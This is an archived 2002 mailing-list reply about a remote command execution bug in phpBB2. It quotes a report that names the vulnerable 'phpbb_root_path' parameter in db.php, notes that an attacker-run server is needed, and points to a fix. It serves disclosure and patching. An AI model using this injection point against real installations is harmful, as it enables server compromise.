Vulnerability Development mailing list archives
Re: phpBB2 remote execution command (fwd)
From: Jose Romeo Vela <jrvela () aristasol com>
Date: Mon, 18 Mar 2002 20:17:42 -0500 (EST)
--- nullbyte <nullbyte () inetd-secure net> wrote:
phpBB2 is vulnerable to remote execution command All *nix running phpBB2 versoion 2.0. Bug could be found at "phpBB2 root path" which is allowed remote attacker to execute any command remotely. The vulnerability of this attack start with '/phpBB2/includes/db.php?phpbb_root_path=' but some backdoor server are needed to launch the attack. I did not look further into this bug. It is tested on most *nix systems running phpBB2 version 2.0. Probably all versions. Bug was found by pokley and nullbyte nullbyte nullbyte () inetd-secure net
This bug only affects non-CVS versions. There is a fix available. For details see: http://phpbb.sourceforge.net/phpBB2/viewtopic.php?t=9105 --------------------------------------------------------------------- Jose Romeo Vela jrvela () aristasol com http://www.aristasol.com/
Current thread:
- Re: phpBB2 remote execution command (fwd) Jose Romeo Vela (Mar 19)